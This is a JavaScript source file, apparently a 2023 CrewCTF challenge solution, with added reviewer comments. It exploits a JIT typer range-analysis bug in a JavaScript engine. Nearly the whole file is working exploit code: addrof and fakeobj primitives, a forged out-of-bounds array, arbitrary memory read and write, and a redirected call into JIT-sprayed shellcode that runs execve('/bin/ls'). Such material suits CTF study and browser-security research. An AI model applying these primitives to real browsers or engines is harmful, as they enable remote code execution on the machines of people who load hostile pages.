2023_crewctf_typer.js
/**
 * Shared 8-byte scratch buffer behind ftoi/itof. `_flt` and `_int` are two
 * views over the same bytes, so writing through one and reading through the
 * other reinterprets the bit pattern without any numeric conversion.
 */
const _buf = new ArrayBuffer(8);
const _flt = new Float64Array(_buf);
const _int = new BigUint64Array(_buf);

/**
 * Write `value` through the `src` view and read the aliased bytes back
 * through the `dst` view.
 * @param {Float64Array|BigUint64Array} src
 * @param {Float64Array|BigUint64Array} dst
 * @param {number|bigint} value
 * @returns {number|bigint}
 */
const reinterpret = (src, dst, value) => {
  src[0] = value;
  return dst[0];
};

/**
 * Float-to-int: the raw IEEE-754 bits of a double as an unsigned 64-bit BigInt.
 * @param {number} x
 * @returns {bigint}
 */
const ftoi = (x) => reinterpret(_flt, _int, x);

/**
 * Int-to-float: the double whose IEEE-754 bits are the low 64 bits of `x`.
 * @param {bigint} x
 * @returns {number}
 */
const itof = (x) => reinterpret(_int, _flt, x);
// execve("/bin/ls", 0, 0);
// Returns eight double constants. Per the comment above they encode an
// execve("/bin/ls", 0, 0) payload. NOTE(review): the final read/write/call
// sequence at the bottom of the file (against `code`, then shell()) depends on
// how this function is compiled by the engine, so the values and their order
// are not arbitrary — inferred from that sequence, not verifiable from here.
const shell = () => {
return [
1.9711828979523134e-246,
1.9562206098792612e-246,
1.9557819155246427e-246,
1.9711824228871598e-246,
1.971182639857203e-246,
1.9711829003383248e-246,
1.9895153920223886e-246,
1.971182898881177e-246
];
};
// Calls shell() 100000 times and discards the result — presumably a warm-up
// so the engine compiles it with its optimizing tier; confirm against the
// intended engine build.
for (let i = 0; i < 100000; i++)
shell();
/**
 * Returns [v, a, b]: `v` is the value yielded by the tenth next() of an
 * iterator over `a`, an array whose length `3 + 30*(1 + i)` depends on the
 * `i` computed below; `a` (doubles stored at [0] and [1]) and `b` (three
 * doubles) are returned with it. Called 50000 times at the bottom of the
 * file, after which `ftoi(_leakmap()[0])` is kept as `map`.
 *
 * NOTE(review): the statement sequence from the -Infinity loop through
 * `i >>= 31` is load-bearing — the author's inline comment records that the
 * challenge engine's typer assigns `i` Range(0, 0) while the value is -1,
 * which is presumably what the array length and the ten next() calls are
 * built around. Under plain interpreted semantics the loop exits with
 * i = NaN and `NaN >> 31` is 0, giving length 33. Do not restyle.
 */
function _leakmap() {
var x = -Infinity;
// i: 0 → -Infinity (i += x) → NaN (i += +Infinity), which fails `i < 1`.
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1.1;
a[1] = 2.2;
let b = [1.1, 2.2, 3.3];
let z = a[Symbol.iterator]();
// Ten next() calls in total; the tenth value is what is returned.
z.next();z.next();z.next();
z.next();z.next();z.next();z.next();z.next();z.next();
let v = z.next().value;
return [v, a, b];
}
/**
 * Same construction as _leakmap(), but `b` holds `obj` in slot 0 and the
 * iterator over `a` is advanced only seven times; returns [v, a, b] where
 * `v` is that seventh value. Warmed up at the bottom with `_addrof({a: 1})`;
 * callers then use `ftoi(_addrof(x)[0]) & 0xffffffffn` as a 32-bit value for
 * `x`.
 *
 * NOTE(review): the statement sequence from the -Infinity loop through
 * `i >>= 31` is load-bearing for the challenge engine's typer (author's
 * inline comment); under plain interpreted semantics `i` ends as
 * `NaN >> 31` === 0. Do not restyle.
 *
 * @param {object} obj value placed in b[0]
 */
function _addrof(obj) {
var x = -Infinity;
// i: 0 → -Infinity → NaN, which fails `i < 1`.
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1.1;
a[1] = 2.2;
let b = [obj, 2, 3];
let z = a[Symbol.iterator]();
// Seven next() calls in total; the seventh value is what is returned.
z.next();z.next();z.next();
z.next();z.next();z.next();
let v = z.next().value;
return [v, a, b];
}
/**
 * Same construction as _leakmap(), with integer stores into `a` ([0] = 1,
 * [1] = 2) and `ptr` stored into b[0] of an otherwise double-valued `b`;
 * returns [o, a, b] where `o` is the tenth next() value of an iterator over
 * `a`. The author's inline comment states that `o` is the object whose
 * address is `ptr`. Warmed up at the bottom with `_fakeobj(itof(0n))`.
 *
 * NOTE(review): `flag` is declared but never read. The statement sequence
 * from the -Infinity loop through `i >>= 31` is load-bearing for the
 * challenge engine's typer (author's inline comment); under plain
 * interpreted semantics `i` ends as `NaN >> 31` === 0. Do not restyle.
 *
 * @param {number} ptr double (see itof) stored into b[0]
 * @param {*} flag unused
 */
function _fakeobj(ptr, flag) {
var x = -Infinity;
// i: 0 → -Infinity → NaN, which fails `i < 1`.
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1;
a[1] = 2;
let b = [1.1, 2.2, 3.3];
b[0] = ptr;
let z = a[Symbol.iterator]();
// Ten next() calls in total; the tenth value is what is returned.
z.next();z.next();z.next();
z.next();z.next();z.next();z.next();z.next();z.next();
let o = z.next().value; // addrof(o) = ptr
return [o, a, b];
}
// Warm-up: call each primitive 50000 times with a throwaway argument,
// discarding results — presumably to have the engine compile them with its
// optimizing tier; confirm against the intended engine build.
for (let i = 0; i < 50000; i++)
_leakmap();
// Raw 64-bit pattern of the value _leakmap() yields after warm-up; reused
// below as the first element of fakeobj_arr.
let map = ftoi(_leakmap()[0]);
for (let i = 0; i < 50000; i++)
_addrof({a: 1});
for (let i = 0; i < 50000; i++)
_fakeobj(itof(0n));
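// Set-up of the arrays that addrof()/read()/write() below operate on, and of
// the array `oob` that they index. The constants used here (64n << 33n,
// 0x901n, 0x0019c6910000117dn, the 0x18n/0x58n + 8n offsets) are not
// explained anywhere in this file — presumably object-layout values for the
// challenge's engine build; they cannot be verified from here.
let store = [itof((64n << 33n) + 0x901n), 1.1, 2.2];
let flt = [1.1];      // read via flt[0] in addrof()
let obj = [{a: 1}];   // written via obj[0] in addrof()
let rdw = [1.1];      // read/written via rdw[0] in read()/write()
// Low 32 bits of the value _addrof() yields for `store`, plus an undocumented
// 0x18n + 8n adjustment.
let store_addr = ftoi(_addrof(store)[0]) & 0xffffffffn;
let fake_store_addr = store_addr + 0x18n + 8n;
let fakeobj_arr = [
  itof(map),                                // raw bits kept from _leakmap()
  itof((64n << 33n) + fake_store_addr),
  itof(0x0019c6910000117dn)
];
let fakeobj_arr_addr = ftoi(_addrof(fakeobj_arr)[0]) & 0xffffffffn;
let target = fakeobj_arr_addr + 0x58n + 8n;
// `oob` is the object _fakeobj() yields for `target`; the author's notes
// below record which of its slots alias the elements of flt/obj/rdw.
let oob = _fakeobj(itof(target))[0];
// flt.elements @ oob[10] (upper)
// obj.elements @ oob[17] (lower)
// rdw.elements @ oob[26] (upper)
// Upper 32 bits of oob[10]. Declared with `let`: the original assigned
// flt_elem without any declaration, creating an implicit global that would
// throw under 'use strict'.
let flt_elem = ftoi(oob[10]) >> 32n;
oob[17] = itof((2n << 32n) + flt_elem);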
/**
 * Stores `o` into obj[0] and returns the low 32 bits of the raw bit pattern
 * of flt[0]. Relies on the set-up above (the write to oob[17]); per the
 * layout notes there, `obj` and `flt` are presumably made to share backing
 * storage so the store shows up in flt[0] — inferred from those notes, not
 * verifiable here.
 * @param {*} o
 * @returns {bigint} 32-bit value
 */
function addrof(o) {
obj[0] = o;
return ftoi(flt[0]) & 0xffffffffn;
}
/**
 * Keeps the low 32 bits of oob[26], replaces its upper 32 bits with
 * `p - 8n + 1n`, then returns the raw 64-bit pattern of rdw[0]. Per the
 * layout note above, oob[26]'s upper half is rdw's elements pointer.
 * NOTE(review): the -8n and +1n adjustments are undocumented, and read() and
 * write() disagree on who applies the +1n — read() adds it here, while
 * write() expects the caller to (see the `+ 1n` at the write() call below).
 * @param {bigint} p
 * @returns {bigint} full 64-bit value; callers mask with 0xffffffffn
 */
function read(p) {
let lower = ftoi(oob[26]) & 0xffffffffn;
oob[26] = itof(((p - 8n + 1n) << 32n) + lower);
return ftoi(rdw[0]);
}
/**
 * Keeps the low 32 bits of oob[26], replaces its upper 32 bits with
 * `p - 8n`, then stores the double whose raw bits are `x` into rdw[0].
 * Per the layout note above, oob[26]'s upper half is rdw's elements pointer.
 * NOTE(review): unlike read(), no +1n is added here; the caller below passes
 * `code + 0x10n + 1n` instead. Returns nothing.
 * @param {bigint} p
 * @param {bigint} x 64-bit pattern to store
 */
function write(p, x) {
let lower = ftoi(oob[26]) & 0xffffffffn;
oob[26] = itof(((p - 8n) << 32n) + lower);
rdw[0] = itof(x);
}
// Final stage: read the value at addrof(shell) - 1 + 0x18 (low 32 bits, minus
// 1) as `code`, read the 8 bytes at code + 0x10 as `entry`, write entry + 0x56
// back at code + 0x10 + 1, then call shell(). The offsets (0x18n, 0x10n,
// 0x56n) and the ±1n adjustments are not explained in this file; per the
// comment on shell(), its double constants are the payload this redirected
// call is meant to reach — inferred, not verifiable here.
let code = (read(addrof(shell) - 1n + 0x18n) - 1n) & 0xffffffffn;
let entry = (read(code + 0x10n));
write(code + 0x10n + 1n, entry + 0x56n);
shell();